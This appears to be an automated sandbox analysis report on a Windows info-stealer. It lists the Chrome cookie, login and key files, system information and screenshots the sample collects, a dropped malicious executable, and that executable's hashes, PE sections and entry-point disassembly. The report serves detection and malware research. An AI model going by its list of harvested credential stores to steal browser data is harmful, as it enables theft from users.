                                                                                                                                                                                SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                Preview: SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\qbTdLHcrfeS\_Files\_Chrome\default_cookies.db
                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\D375.exe
                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):20480
                                                                                                                                                                                Entropy (8bit):0.6970840431455908
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBocLgAZOZD/0:T5LLOpEO5J/Kn7U1uBo8NOZ0
                                                                                                                                                                                MD5:00681D89EDDB6AD25E6F4BD2E66C61C6
                                                                                                                                                                                SHA1:14B2FBFB460816155190377BBC66AB5D2A15F7AB
                                                                                                                                                                                SHA-256:8BF06FD5FAE8199D261EB879E771146AE49600DBDED7FDC4EAC83A8C6A7A5D85
                                                                                                                                                                                SHA-512:159A9DE664091A3986042B2BE594E989FD514163094AC606DC3A6A7661A66A78C0D365B8CA2C94B8BC86D552E59D50407B4680EDADB894320125F0E9F48872D3
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                Preview: SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\qbTdLHcrfeS\_Files\_Chrome\default_key.bin
                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\D375.exe
                                                                                                                                                                                File Type:data
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):32
                                                                                                                                                                                Entropy (8bit):5.0
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:3:jYUbMR8o9eZwo:kUbMqo9Gwo
                                                                                                                                                                                MD5:FC370DE3AE9A03C5666D84F3350DDC91
                                                                                                                                                                                SHA1:62E22644A9485F6B70EAEEFFDA8B8C3B2C4D03F1
                                                                                                                                                                                SHA-256:17D41F57A87688AF3A7C0216D4E6A2D13F09C1CA78290B959DFDD7970B1797A4
                                                                                                                                                                                SHA-512:31FCE8B4462DAE87DE334EF9D7E27A47C50BAD44652146A75F0A82DE5E3CD9BC6CCF23EE43A54BAA97A90E9F47198A7C3DB21F9C2110F854D41434A9D11EBEC3
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                Preview: ..}.(n.=..1..$t?!...;..kJGBD2.I
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\qbTdLHcrfeS\_Files\_Chrome\default_logins.db
                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\D375.exe
                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):40960
                                                                                                                                                                                Entropy (8bit):0.792852251086831
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                                                                                                                                                MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                                                                                                                                                SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                                                                                                                                                SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                                                                                                                                                SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                Preview: SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\qbTdLHcrfeS\_Files\_Chrome\default_webdata.db
                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\D375.exe
                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):73728
                                                                                                                                                                                Entropy (8bit):1.1874185457069584
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                                                                                                                                MD5:72A43D390E478BA9664F03951692D109
                                                                                                                                                                                SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                                                                                                                                SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                                                                                                                                SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                Preview: SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\qbTdLHcrfeS\_Files\_Information.txt
                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\D375.exe
                                                                                                                                                                                File Type:Little-endian UTF-16 Unicode text, with CRLF, CR line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):4210
                                                                                                                                                                                Entropy (8bit):3.522601689980959
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:96:soteBvwHOSH8vsc/HcDPV2GJVfMGJGmcHOhsgDxGBSS4MQcU3p:qNi8UOpGQGXJp
                                                                                                                                                                                MD5:6B020A8C0E613CD6E059785E0552B4C1
                                                                                                                                                                                SHA1:AEA2B9969810AD8E70A054B24E6F719F2FA21FC6
                                                                                                                                                                                SHA-256:8C48DBA425FC0A4921F44F0928705F08954BFE01300A52CD0325B3384919C7D4
                                                                                                                                                                                SHA-512:A0378FBE2DC91DDB1DC317F8DEF77A786F8C1E8501AFEDF03AD4435888BE18B213D711D56761750BB9D62F3941059742C1839C96A882AB55C4D2B5C50CED2FAF
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                Preview: ..S.t.a.r.t. .B.u.i.l.d.:. . . . . . . . . . . . . .C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.D.3.7.5...e.x.e.....O.S.:. . . . . . . . . . . . . . . . . . . . . . .W.i.n.d.o.w.s. .1.0. .P.r.o. . . .6.4.-.b.i.t._.(.x.6.4.). . . .B.u.i.l.d.:. .1.7.1.3.4. . . .R.e.l.e.a.s.e.:. .1.8.0.3.....O.S. .L.a.n.g.u.a.g.e.:. . . . . . . . . . . . . .e.n.-.U.S.....K.e.y.b.o.a.r.d. .L.a.n.g.u.a.g.e.s.:. . . . . . .E.n.g.l.i.s.h. .(.U.n.i.t.e.d. .S.t.a.t.e.s.). .|. .....L.o.c.a.l. .D.a.t.e. .a.n.d. .T.i.m.e.:. . . . . .2.0.2.1.-.1.2.-.0.1. .1.0.:.0.5.:.2.5.....U.T.C.:. . . . . . . . . . . . . . . . . . . . . .-.0.8.0.0.....U.s.e.r.N.a.m.e. .(.C.o.m.p.u.t.e.r.N.a.m.e.).:. .h.a.r.d.z. .(.2.1.6.5.5.4.).....C.P.U.:. . . . . . . . . . . . . . . . . . . . . .I.n.t.e.l.(.R.). .C.o.r.e.(.T.M.).2. .C.P.U. .6.6.0.0. .@. .2...4.0. .G.H.z. .(.C.o.r.e.s.:. .4.).....T.o.t.a.l. .R.A.M.:. . . . . . . . . . . . . . . .8.1.9.1. . .M.B.....G.P.U.:. . . . . . . . . . . . . . . . . . . . . .A.M.D.
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\qbTdLHcrfeS\_Files\_Screen_Desktop.jpeg
                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\D375.exe
                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, frames 3
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):61995
                                                                                                                                                                                Entropy (8bit):7.751969065949765
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:1536:IcpJ1w/lxFk+PBBUpMKtwtDxwjpmAO+uz5S:Xnw/lgaBUbwtNwTOZzE
                                                                                                                                                                                MD5:CB57DABF20AA73C74D4F9264D3711C14
                                                                                                                                                                                SHA1:0C98B0A062B0D34DDE8D55A82E705E0AC4F702D2
                                                                                                                                                                                SHA-256:F55B9934FDFF0546A214ECDC90F85210FFB945E43119D84C87B2FB4D829582A3
                                                                                                                                                                                SHA-512:F3DC6A83CA9EC0D41F35BE5579905270A6DB634724E499D5BC56E762DABF81997999404A7C6F8339CC26642930DE76ACEB59633D12C499F9FCAC2E6304921838
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                Preview: ......JFIF.....`.`.....C................%.....- ".%5/874/43;BUH;?P?34JdKPWZ_`_9Ghog\nU]_[...C.......+..+[=4=[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..E-.(...(..U..K2..,p$s.~...*.:-.|.+.......6.Y.t....X..s...r6.\..?....I..a..~dQ..cQS..\....^0z.8?C...D.E-..JJZJ.%%v.|>d8:.......SG.....O.. ..U..T{.f..}.2.......S..%...*./....qm...+G....3...Z.4.&P.w ..+R..(...+..?.t.kO...'g.].U..I..+.e......._.._..i?...........4W}...........q...h=..\..F..J...z..$.j.i)M...E-..J)i(...(...(...(...(...(...(...Z.J)h.....b......0.J\Q.
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\qbTdLHcrfeS\files_\_Chrome\default_cookies.db
                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\D375.exe
                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):20480
                                                                                                                                                                                Entropy (8bit):0.6970840431455908
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBocLgAZOZD/0:T5LLOpEO5J/Kn7U1uBo8NOZ0
                                                                                                                                                                                MD5:00681D89EDDB6AD25E6F4BD2E66C61C6
                                                                                                                                                                                SHA1:14B2FBFB460816155190377BBC66AB5D2A15F7AB
                                                                                                                                                                                SHA-256:8BF06FD5FAE8199D261EB879E771146AE49600DBDED7FDC4EAC83A8C6A7A5D85
                                                                                                                                                                                SHA-512:159A9DE664091A3986042B2BE594E989FD514163094AC606DC3A6A7661A66A78C0D365B8CA2C94B8BC86D552E59D50407B4680EDADB894320125F0E9F48872D3
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                Preview: SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\qbTdLHcrfeS\files_\_Chrome\default_key.bin
                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\D375.exe
                                                                                                                                                                                File Type:data
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):32
                                                                                                                                                                                Entropy (8bit):5.0
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:3:jYUbMR8o9eZwo:kUbMqo9Gwo
                                                                                                                                                                                MD5:FC370DE3AE9A03C5666D84F3350DDC91
                                                                                                                                                                                SHA1:62E22644A9485F6B70EAEEFFDA8B8C3B2C4D03F1
                                                                                                                                                                                SHA-256:17D41F57A87688AF3A7C0216D4E6A2D13F09C1CA78290B959DFDD7970B1797A4
                                                                                                                                                                                SHA-512:31FCE8B4462DAE87DE334EF9D7E27A47C50BAD44652146A75F0A82DE5E3CD9BC6CCF23EE43A54BAA97A90E9F47198A7C3DB21F9C2110F854D41434A9D11EBEC3
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                Preview: ..}.(n.=..1..$t?!...;..kJGBD2.I
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\qbTdLHcrfeS\files_\_Chrome\default_logins.db
                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\D375.exe
                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):40960
                                                                                                                                                                                Entropy (8bit):0.792852251086831
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                                                                                                                                                MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                                                                                                                                                SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                                                                                                                                                SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                                                                                                                                                SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                Preview: SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\qbTdLHcrfeS\files_\_Chrome\default_webdata.db
                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\D375.exe
                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):73728
                                                                                                                                                                                Entropy (8bit):1.1874185457069584
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                                                                                                                                MD5:72A43D390E478BA9664F03951692D109
                                                                                                                                                                                SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                                                                                                                                SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                                                                                                                                SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                Preview: SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\qbTdLHcrfeS\files_\screenshot.jpg
                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\D375.exe
                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, frames 3
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):61995
                                                                                                                                                                                Entropy (8bit):7.751969065949765
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:1536:IcpJ1w/lxFk+PBBUpMKtwtDxwjpmAO+uz5S:Xnw/lgaBUbwtNwTOZzE
                                                                                                                                                                                MD5:CB57DABF20AA73C74D4F9264D3711C14
                                                                                                                                                                                SHA1:0C98B0A062B0D34DDE8D55A82E705E0AC4F702D2
                                                                                                                                                                                SHA-256:F55B9934FDFF0546A214ECDC90F85210FFB945E43119D84C87B2FB4D829582A3
                                                                                                                                                                                SHA-512:F3DC6A83CA9EC0D41F35BE5579905270A6DB634724E499D5BC56E762DABF81997999404A7C6F8339CC26642930DE76ACEB59633D12C499F9FCAC2E6304921838
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                Preview: ......JFIF.....`.`.....C................%.....- ".%5/874/43;BUH;?P?34JdKPWZ_`_9Ghog\nU]_[...C.......+..+[=4=[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..E-.(...(..U..K2..,p$s.~...*.:-.|.+.......6.Y.t....X..s...r6.\..?....I..a..~dQ..cQS..\....^0z.8?C...D.E-..JJZJ.%%v.|>d8:.......SG.....O.. ..U..T{.f..}.2.......S..%...*./....qm...+G....3...Z.4.&P.w ..+R..(...+..?.t.kO...'g.].U..I..+.e......._.._..i?...........4W}...........q...h=..\..F..J...z..$.j.i)M...E-..J)i(...(...(...(...(...(...(...Z.J)h.....b......0.J\Q.
                                                                                                                                                                                C:\Users\user\AppData\Roaming\ddigjgj
                                                                                                                                                                                Process:C:\Windows\explorer.exe
                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):162304
                                                                                                                                                                                Entropy (8bit):6.257421049731965
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:3072:U8SeVh8bW4CwA7OoEfLNFdnqP/uFkAXGHrIsHcW7qXUHf9bQ2:fvDiWpwA7OoWr2uFlGcs8RUHf9P
                                                                                                                                                                                MD5:C6E5298F945F91851744F96EE16412E5
                                                                                                                                                                                SHA1:960D38C010136A907DE89E32835608D92A200829
                                                                                                                                                                                SHA-256:F7B5A27355EAFA5302A38A1E0ADADCB619B6D42E7C1707A784297634A180A66F
                                                                                                                                                                                SHA-512:72C64EE58642A15259676259FD76582270BDC6E340A207977A8A22999E7E16FD752109E58AE8A6FB306A624221D5025C66583587CB8A074715EBF39E01B10828
                                                                                                                                                                                Malicious:true
                                                                                                                                                                                Antivirus:
                                                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...............................................................................................................PE..L....i|_.................@....t......*.......P....@..........................0v............................................4...x.....u..............................Q..................................@............P..d............................text....>.......@.................. ..`.rdata..n....P.......D..............@..@.data...`us.........................@....livucucr....pu.....................@..@.vuf....p.....u.....................@..`.duha.........u.....................@..`.rsrc.........u.....................@..@................................................................................................................................................................................................................................................
                                                                                                                                                                                C:\Users\user\AppData\Roaming\ddigjgj:Zone.Identifier
                                                                                                                                                                                Process:C:\Windows\explorer.exe
                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):26
                                                                                                                                                                                Entropy (8bit):3.95006375643621
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                Malicious:true
                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                Preview: [ZoneTransfer]....ZoneId=0

                                                                                                                                                                                Static File Info

                                                                                                                                                                                General

                                                                                                                                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                Entropy (8bit):6.257421049731965
                                                                                                                                                                                TrID:
                                                                                                                                                                                • Win32 Executable (generic) a (10002005/4) 99.94%
                                                                                                                                                                                • Clipper DOS Executable (2020/12) 0.02%
                                                                                                                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                • VXD Driver (31/22) 0.00%
                                                                                                                                                                                File name:QMn13jz6nj.exe
                                                                                                                                                                                File size:162304
                                                                                                                                                                                MD5:c6e5298f945f91851744f96ee16412e5
                                                                                                                                                                                SHA1:960d38c010136a907de89e32835608d92a200829
                                                                                                                                                                                SHA256:f7b5a27355eafa5302a38a1e0adadcb619b6d42e7c1707a784297634a180a66f
                                                                                                                                                                                SHA512:72c64ee58642a15259676259fd76582270bdc6e340a207977a8a22999e7e16fd752109e58ae8a6fb306a624221d5025c66583587cb8a074715ebf39e01b10828
                                                                                                                                                                                SSDEEP:3072:U8SeVh8bW4CwA7OoEfLNFdnqP/uFkAXGHrIsHcW7qXUHf9bQ2:fvDiWpwA7OoWr2uFlGcs8RUHf9P
                                                                                                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...............................................................................................................PE..L....i|_...........

                                                                                                                                                                                File Icon

                                                                                                                                                                                Icon Hash:acfc36b6b694c6e2

                                                                                                                                                                                Static PE Info

                                                                                                                                                                                General

                                                                                                                                                                                Entrypoint:0x402a12
                                                                                                                                                                                Entrypoint Section:.text
                                                                                                                                                                                Digitally signed:false
                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                Subsystem:windows gui
                                                                                                                                                                                Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
                                                                                                                                                                                DLL Characteristics:TERMINAL_SERVER_AWARE, NX_COMPAT
                                                                                                                                                                                Time Stamp:0x5F7C6990 [Tue Oct 6 12:56:48 2020 UTC]
                                                                                                                                                                                TLS Callbacks:
                                                                                                                                                                                CLR (.Net) Version:
                                                                                                                                                                                OS Version Major:5
                                                                                                                                                                                OS Version Minor:1
                                                                                                                                                                                File Version Major:5
                                                                                                                                                                                File Version Minor:1
                                                                                                                                                                                Subsystem Version Major:5
                                                                                                                                                                                Subsystem Version Minor:1
                                                                                                                                                                                Import Hash:9d24ccac58ecf11e70c100743c701d44

                                                                                                                                                                                Entrypoint Preview

                                                                                                                                                                                Instruction
                                                                                                                                                                                call 00007FD33CD50E17h
                                                                                                                                                                                jmp 00007FD33CD4DE7Eh
                                                                                                                                                                                mov eax, 0041F010h
                                                                                                                                                                                ret
                                                                                                                                                                                mov eax, dword ptr [02B56540h]
                                                                                                                                                                                push esi
                                                                                                                                                                                push 00000014h
                                                                                                                                                                                pop esi
                                                                                                                                                                                test eax, eax
                                                                                                                                                                                jne 00007FD33CD4DFF9h
                                                                                                                                                                                mov eax, 00000200h
                                                                                                                                                                                jmp 00007FD33CD4DFF8h
                                                                                                                                                                                cmp eax, esi
                                                                                                                                                                                jnl 00007FD33CD4DFF9h
                                                                                                                                                                                mov eax, esi
                                                                                                                                                                                mov dword ptr [02B56540h], eax
                                                                                                                                                                                push 00000004h
                                                                                                                                                                                push eax
                                                                                                                                                                                call 00007FD33CD50EC5h
                                                                                                                                                                                pop ecx
                                                                                                                                                                                pop ecx
                                                                                                                                                                                mov dword ptr [02B55520h], eax
                                                                                                                                                                                test eax, eax
                                                                                                                                                                                jne 00007FD33CD4E010h
                                                                                                                                                                                push 00000004h
                                                                                                                                                                                push esi
                                                                                                                                                                                mov dword ptr [02B56540h], esi
                                                                                                                                                                                call 00007FD33CD50EACh
                                                                                                                                                                                pop ecx
                                                                                                                                                                                pop ecx
                                                                                                                                                                                mov dword ptr [02B55520h], eax
                                                                                                                                                                                test eax, eax
                                                                                                                                                                                jne 00007FD33CD4DFF7h
                                                                                                                                                                                push 0000001Ah
                                                                                                                                                                                pop eax
                                                                                                                                                                                pop esi
                                                                                                                                                                                ret
                                                                                                                                                                                xor edx, edx
                                                                                                                                                                                mov ecx, 0041F010h
                                                                                                                                                                                jmp 00007FD33CD4DFF7h
                                                                                                                                                                                mov eax, dword ptr [02B55520h]
                                                                                                                                                                                mov dword ptr [edx+eax], ecx
                                                                                                                                                                                add ecx, 20h
                                                                                                                                                                                add edx, 04h
                                                                                                                                                                                cmp ecx, 0041F290h
                                                                                                                                                                                jl 00007FD33CD4DFDCh
                                                                                                                                                                                push FFFFFFFEh
                                                                                                                                                                                pop esi
                                                                                                                                                                                xor edx, edx
                                                                                                                                                                                mov ecx, 0041F020h
                                                                                                                                                                                push edi
                                                                                                                                                                                mov eax, edx
                                                                                                                                                                                sar eax, 05h
                                                                                                                                                                                mov eax, dword ptr [02B55420h+eax*4]
                                                                                                                                                                                mov edi, edx
                                                                                                                                                                                and edi, 1Fh
                                                                                                                                                                                shl edi, 06h
                                                                                                                                                                                mov eax, dword ptr [edi+eax]
                                                                                                                                                                                cmp eax, FFFFFFFFh
                                                                                                                                                                                je 00007FD33CD4DFFAh
                                                                                                                                                                                cmp eax, esi
                                                                                                                                                                                je 00007FD33CD4DFF6h
                                                                                                                                                                                test eax, eax
                                                                                                                                                                                jne 00007FD33CD4DFF4h
                                                                                                                                                                                mov dword ptr [ecx], esi
                                                                                                                                                                                add ecx, 20h
                                                                                                                                                                                inc edx
                                                                                                                                                                                cmp ecx, 0041F080h
                                                                                                                                                                                jl 00007FD33CD4DFC0h
                                                                                                                                                                                pop edi
                                                                                                                                                                                xor eax, eax
                                                                                                                                                                                pop esi
                                                                                                                                                                                ret
                                                                                                                                                                                call 00007FD33CD4F643h
                                                                                                                                                                                cmp byte ptr [00000000h], 00000000h

                                                                                                                                                                                Data Directories

                                                                                                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x1d8340x78.rdata
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x275a0000x8080.rsrc
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x151b00x1c.rdata
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x185c00x40.rdata
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x150000x164.rdata
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                Sections

                                                                                                                                                                                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                .text0x10000x13e900x14000False0.772229003906data7.46968213296IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                .rdata0x150000x906e0x9200False0.223432148973data2.87249855126IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                .data0x1f0000x27375600x1800unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                .livucuc0x27570000x2720x400False0.0166015625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                .vuf0x27580000x2700x400False0.0166015625data0.0IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
